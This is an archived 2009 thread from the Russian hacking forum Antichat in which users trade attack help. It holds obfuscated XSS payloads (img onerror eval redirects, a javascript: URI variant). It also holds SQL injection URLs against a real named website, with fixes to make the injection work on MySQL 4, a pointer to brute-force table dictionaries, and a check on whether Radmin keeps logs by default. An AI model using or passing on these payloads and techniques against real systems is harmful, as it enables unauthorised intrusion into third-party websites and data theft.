ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.09.2009, 12:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Всё обыскал, всех опросил, ну никто не знает хранит ли Радмин логи по умАлчанию(( так что ничем помочь наверно не смогу.
Но вот мануаль,который так трудно было найти на сайте производителя Радмин, и в гугле его вобще нет на первом месте в странице результатов
(ССылка на мануаль, ВЫ ТОЛЬКО ПРЕДСТАВЬТЕ!!!!!!! на ВТОРОМ МЕСТЕ!!ААА..какой ужас) предложил вариант со словом умОлчание, хотя это конечно бред скорее всего, но может и что-то полезное будет.
Для тех,кто не хочет тратить свое время, я подчеркиваю, для ДОЛБО..ой, то есть для Exploit, привожу фрагмент мануала:
Протоколирование
Все действия программы могут заноситься в протокол (лог-файл). Чтобы включить
протоколирование, запустите «Настройки Remote Administrator server» (Settings for Remote
Administrator server) из группы Radmin в меню «Пуск». Нажмите кнопку «Опции…» (Options).
Включите опцию «Вести протокол» (Use logfile) и сохраните изменения нажатием кнопки
«OK».
В среде Windows NT 4.0/2000/XP/2003 возможно внесение записей не только в собственный
лог-файл, но и в журнал событий (Event Log).
|
|
|
15.09.2009, 13:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Нет, по дефолту не хранит.
|
|
|
|
15.09.2009, 21:08
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737
Репутация:
180
|
|
Возможноли через конструкцию выполнения скрипта javascript:.... (например javascript=alert()) сделать код для редиректа ? Например с использованием eval - javascript:eval("злой_код")
И как это можно сделать. А если низя, то почему ?
|
|
|
|
15.09.2009, 21:12
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.
например javascript=alert()
вместо "=" должно быть ":", хотя подозреваю, что просто опечатка) |
|
|
|
15.09.2009, 21:20
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737
Репутация:
180
|
|
Сообщение от BlackSun
<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.
вместо "=" должно быть ":", хотя подозреваю, что просто опечатка) Понятно, но я не это имел ввиду. Нужно чтото вроде
<img src="javascript :ЗЛОЙ_КОД_ДЛЯ_РЕДИР КТА">
спросите почему так - потомучто что я не слова неговорил про img вообще, а если тег не img и нету в теге параметров типа onerror... А есть проста возможность вставить куданибуть конструкцию javascript :...
вот в чем вся соль (с) ...
|
|
|
|
15.09.2009, 21:25
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
src=javscript:eval("document.location.href='http://google.com/';")
src=javscript:eval(String.fromCharCode(100,111,99, 117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))
Не вижу никакой разницы.
|
|
|
|
15.09.2009, 21:25
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Не могу понять, в
Код HTML:
http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
все норм показывает, видимые поля есть, все дела.
Как только ввожу
Код HTML:
http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables--
показывает ошибку, что за беда подскажите плз. |
|
|
|
15.09.2009, 21:29
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Gemini12, коментарий "--" требует пробел в конце.
Во вторых версия мускула 4я, в ней нет information_schema.
|
|
|
|
15.09.2009, 21:35
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
2BlackSun
Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.
|
|
|
|
15.09.2009, 21:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Gemini12:
такого списка нет. Есть словари для брута - таблиц и колонок. Имеются в комплекте у SIPT4. У всех разные. У кого больше, у кого меньше
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
